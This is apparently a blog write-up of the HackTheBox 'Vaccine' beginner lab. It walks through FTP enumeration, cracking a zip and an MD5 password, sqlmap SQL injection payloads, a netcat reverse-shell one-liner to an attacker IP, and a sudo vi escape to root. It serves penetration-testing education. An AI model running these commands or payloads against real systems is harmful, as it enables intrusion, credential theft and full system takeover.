HackTheBox | Vaccine

If you think October is only the spooky month, well you’re wrong! October is also known as Cyber Security Month!.

To celebrate the month, HackTheBox renewed their Starting-Point which is a path for beginner that want to start hacking to learn. And I must say it is very well made.

HackTheBox! (Literally)

In the path they are 3 tiers., tier 0 ,tier 1 and lastly tier 2. What you’re going to read is a box from Tier 2 called Vaccine.

Vaccine Room rated as Easy.

Enumeration

First step is always enumeration! Enumeration is the key to victory.

NMAP

PORT   STATE SERVICE REASON  VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.31
| Logged in as ftpuser
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzC28uKxt9pqJ4fLYmq/X5t7p44L+bUFQIDeEab29kDPnKdFOa9ijB5C5APVxLaAXVYSXATPYUqjIEWU98Vvvol1zuc82+KG9KfX94pD8TaPY2MZnoi9TfSxgwmKpmiRWR4DwwMS+mNo+WBU3sjB2QjgNip2vbiHxMitKeIfDLLFYiLKhc1eBRtooZ6DJzXQOMFp5QhSbZygWqebpFcsrmFnz9QWhx4MekbUnUVPKwCunycLi1pjrsmOAekbGz3/5R3H5tFSck915iqyc8bSkBZgRwW3FDJAXFmFgHG9fX727HsXFk8MXmVRMuH1LxGjvn1q3j27bb22QzprS7t9bJciWfwgt1sl57S0Q+iFbku83NgAFxUG373nspOHn08DwMllCyeLOG3Oy3x9zcCxMGATopiPckt8lb1GCWIvLPSNHMW12OyCKGM+AmLu4q9z7zX1YOUM6oxfn3qZVLKSZJ/DJu+aifv2BVNu/zJU2wdk1vFxysmQ4roj5O5I+H9x0=
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNsSORVFGkIbgItDm/mxmyPhpsIJihXV8y4CQiMTWGdEVQatXNIlXX0yGLZ4JFtPEX9rOGAp/eLZc0mGJtDyuyQ=
| 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMXvk132UscLPAfaZyZ2Av54rpw9cP31OrloBE9v3SLW
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  • Lot’s of information to process don’t worry, take your time! Time is always on our side.
  • Now let’s choose a rabbit hole to go into.

FTP

  • From the NMAP scan, we can see that it says along the line of
Anonymous login is allowed.
  • That means we can login into the File Transfer Protocol (FTP for short) server without valid credentials.
  • When logged in, we can list out the files and directories inside the server.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
  • A backup file? Let’s get that first and look around for more. If there is not anything, let’s get out of this server!
  • Trying to unzip the file, but it’s password protected! Crap.

John The Ripper

As hackers we always find a way to break something.

  • We can use a utility from John The Ripper (JTR for short) for cracking zip files password called zip2john.
  • Now we need a wordlist to crack it against, we’ll be using the famous rockyou.txt
  • After a while we get a result!

backup.zip:741852963::backup.zip:style.css, index.php:backup.zip

Looks like the password was 741852963

  • Unzipping the file it contains index.php and style.css
  • We’re more interested in the source code of index.php.
  • Looking around the source, we find PHP handling the login function of a site.
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
$_SESSION['login'] = "true";
header("Location: dashboard.php");
}
}
?>

So what’s its doing is if the POST password variable is set, check if the md5 hash of the password matches 2cb42f8734ea607eefed3b70af13bbd3.

  • So there is a login page on this server somewhere.
  • We could try to brute-force the password but that’s not working smart.
  • Since we have the hash of the password it wants, we can crack it to see what the value is
  • We’ll be using crackstation for this and we get it in a second.
admin:qwerty789

Web

  • Visiting the URL, we have a login page for MegaCorp.
  • Let’s use the credentials we found earlier.
  • And we’re able to login.
  • We’re presented with a list of tables of cars and there is a search box.
  • Since it’s fetching the data somewhere, it is possibly fetching from a database?
  • Let’s try a single quote in the search to see what happens.
ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^

Okay so we have a possible SQL injection in our hands.

Exploit

  • We could do it manually but it’ll take some time so we’ll use a tool made specific for this called Sqlmap.
  • So what I do when dealing with SQL injections is I save the request using Burp Suite which is a Man In The Middle (MITM for short) tool and send to Sqlmap to reduce errors and it’s way easier.
Burp is a tool created by PortSwigger
GET /dashboard.php?search=3 HTTP/1.1
Host: 10.129.142.249
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.142.249/dashboard.php?search=2
Cookie: PHPSESSID=i8jmu9jjje1t69tjt27ouk1mu7
Upgrade-Insecure-Requests: 1

Now click save item.

  • So now we don’t have to supply any cookies or anything to SQLMAP when performing the request.

$ sqlmap -r ~/sql --batch --os-shell

  • The parameter search is indeed vulnerable to SQL injection. The DBMS in use is PostgresSQL.
Parameter: search (GET)
Type: boolean-based blind
Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
Payload: search=3' AND (SELECT (CASE WHEN (4656=4656) THEN NULL ELSE CAST((CHR(86)||CHR(89)||CHR(99)||CHR(101)) AS NUMERIC) END)) IS NULL-- gQNp

Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=3' AND 1330=CAST((CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (1330=1330) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(112)||CHR(113)) AS NUMERIC)-- FumX

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=3';SELECT PG_SLEEP(5)--

Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=3' AND 5698=(SELECT 5698 FROM PG_SLEEP(5))-- QKVO

By supplying os-shell, if it’s possible, SQLMAP will give us a shell back

  • And we do get a shell but it’s very unstable.
  • Before performing further, let’s get a better shell through reverse shell.

os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.31 9001 >/tmp/f

  • Now we have a better shell on port 9001

Post-Exploit

Now we’re in now what.

  • We are user postgres, we’re in the sudo groups somehow.
  • Try to run sudo but we need a password.
  • Always try with the passwords that we found incase there is any password reuse. But in this case there is not.
  • We do find a private key in .ssh but we don’t have a password to login with.
  • Now when you don’t know what to do, run linpeas. Linpeas is a linux enumeration tool.

Internal Enumeration

  • We have a few interesting findings :
/home/
/home/ftpuser/ftp/backup.zip
/home/simon/.bash_history
/root/
/var/lib/postgresql/.bash_history
/var/lib/postgresql/.psql_history
  • All the .bash_history is empty sadly.
  • Now since we know there is site, let’s check /var/www/html
  • We haven’t check dashboard.php so let’s check the source code of that.
  • We find out how it’s connecting to the database to fetch data.
try {
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}

Hard coding credentials in source code isn’t really a great idea

  • Possible credentials :

postgres:P@s5w0rd!

  • Now let’s try sudo -l again.
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • Okay, first thing first let’s SSH into the server first for a more stable shell.

Privilege Escalation

  • Okay, we know that we can run sudo on /bin/vi /etc/postgresql/11/main/pg_hba.conf
  • If you’re unaware, vi is a command line text editor.
  • One thing that people don’t realize is that you can run commands while in vi (cool huh)
  • To do this, first let’s open up the file using sudo

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

  • Now we’re in vi mode.
  • Now hit the escape key (ESC), and we get a command bar on the bottom. It’s used for vi keybinds and all that cool stuff.
  • To run commands, first type : and followed by ! now type whatever command you want! I’ll be spawning a root shell.
:!/bin/bash
  • And we should be root now!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
FarisArch

FarisArch

Student that loves FOSS and hacking